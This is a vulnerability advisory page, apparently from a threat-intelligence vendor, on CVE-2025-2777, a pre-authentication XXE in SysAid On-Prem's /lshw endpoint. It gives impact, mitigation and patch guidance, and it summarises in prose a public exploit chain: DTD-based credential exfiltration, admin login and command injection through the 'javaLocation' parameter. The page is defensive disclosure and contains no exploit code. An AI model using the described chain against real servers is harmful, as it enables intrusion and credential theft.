Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to vulnerabilities
CriticalPublic exploit

Unauthenticated XXE in SysAid On-Prem lshw Processing

IdentifiersCVE-2025-2777CWE-611· Improper Restriction of XML…

CVE-2025-2777 is an unauthenticated XML External Entity (XXE) vulnerability affecting SysAid On-Prem versions 23.3.40 and earlier. The flaw is present in the lshw processing functionality, including the /lshw endpoint, where attacker-supplied XML is parsed unsafely. A remote, unauthenticated attacker can send a crafted HTTP POST request containing malicious XML entities and cause the application to resolve external entities or process local resources. According to the provided reporting, this issue is one of several pre-auth XXE flaws in SysAid that stem from the same underlying XML parsing weakness. Successful exploitation can provide file-read primitives, including access to an installation-created file containing the main administrator's clear-text password, and can enable administrator account takeover. The broader reporting also notes that XXE in this product family may enable SSRF behavior and, when chained with CVE-2025-2778 or in some reporting CVE-2024-36394, may contribute to full remote code execution, but CVE-2025-2777 itself is specifically described here as an XXE leading to admin takeover and file disclosure.

Share:
For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial
ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows an unauthenticated remote attacker to read files accessible to the SysAid application and obtain sensitive data sufficient for administrator account takeover. The disclosed impact includes arbitrary file-read primitives and recovery of the main administrator's clear-text password from an installation-created file. This can lead to full compromise of the SysAid application, exposure of internal configuration and secrets, and potentially SSRF-style access to internal resources via XML entity resolution. While the provided content indicates that full unauthenticated RCE may be achievable when this flaw is chained with a separate command injection vulnerability, that RCE outcome is not the direct standalone impact attributed to CVE-2025-2777 itself.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, reduce exposure by restricting or removing internet access to SysAid On-Prem, especially the vulnerable lshw functionality and related pre-auth endpoints. Limit access to trusted administrative networks or VPN-only paths, monitor for crafted XML POST requests to /lshw and related endpoints, and inspect for outbound DNS/HTTP callbacks indicative of XXE/OAST activity. Review SysAid administrator credentials and rotate them if compromise is suspected, particularly because the vulnerability may expose clear-text admin credentials. Also review logs and network telemetry for signs of file disclosure, SSRF, or follow-on exploitation attempts.

Remediation

Patch, then assume compromise.

Upgrade SysAid On-Prem to a fixed release. The provided content states that SysAid addressed CVE-2025-2777 in version 24.4.60 build 16, released in early March 2025. Affected versions are 23.3.40 and earlier. Apply the vendor update through normal change-management and testing procedures, and ensure all internet-exposed SysAid On-Prem instances are brought to 24.4.60 build 16 or later.
PUBLIC EXPLOITS

Exploits

1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos.

VALID 1 / 1 TOTALView more in app
watchTowr-vs-SysAid-PreAuth-RCE-ChainMaturityPoCVerified exploit

This repository contains a Python proof-of-concept exploit for a pre-authentication remote code execution (RCE) chain affecting SysAid Server (versions <= 23.3.40), targeting CVE-2025-2775 through CVE-2025-2778. The exploit leverages a chained attack: it first uses an XXE vulnerability to leak admin credentials from a file on the target server, then logs in as the admin, and finally abuses a command injection flaw in the 'javaLocation' parameter of API.jsp to execute arbitrary commands supplied by the attacker. The exploit requires the attacker to run a local HTTP server (on port 80) to serve a malicious DTD and receive exfiltrated data. The main code file, 'watchTowr-vs-SysAid-PreAuth-RCE-Chain.py', is the entry point and orchestrates the entire attack chain. The README provides usage instructions, affected versions, and references. The exploit is a functional PoC and demonstrates full compromise of the target system if successful.

watchtowrlabsDisclosed Mar 28, 2025pythonnetwork
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType
SysaidSysaidapplication
SysaidSysaid On-Premisesapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

ACTIVITY FEED

Recent activity

17 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

17 SOURCESView more in app
labs greynoise ioNews
Feb 22, 2026
GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-20 - GreyNoise Labs

SysAid XML External Entity (XXE) vulnerability referenced as part of observed scanning payload tags.

Read more
labs greynoise ioNews
Feb 15, 2026
GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-13 - GreyNoise Labs

A SysAid on-premises XXE vulnerability referenced as a scanning target.

Read more
cloudatg insightsNews
Feb 13, 2026
AI Development & Software Engineering | CloudATG

One of several SysAid on-premise XXE vulnerabilities that can be exploited for pre-auth remote code execution with elevated privileges.

Read more
the hacker newsNews
Jul 23, 2025
CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF

A pre-authentication XXE vulnerability in SysAid's /lshw endpoint, disclosed alongside the other SysAid XXE flaws and addressed in the same fixed release.

Read more
+4 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
Start free trial
Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware1

Malware families riding this exploit, with evidence and IOCs.

Detection signatures1

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity9

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES
MITRE CVE
cve.org · CVE-2025-2777
NVD
nvd.nist.gov/vuln/detail/CVE-2025-2777
MITRE CWE · CWE-611
Improper Restriction of XML External Entity…
Third Party Advisory
labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket
Release Notes
documentation.sysaid.com/docs/24-40-60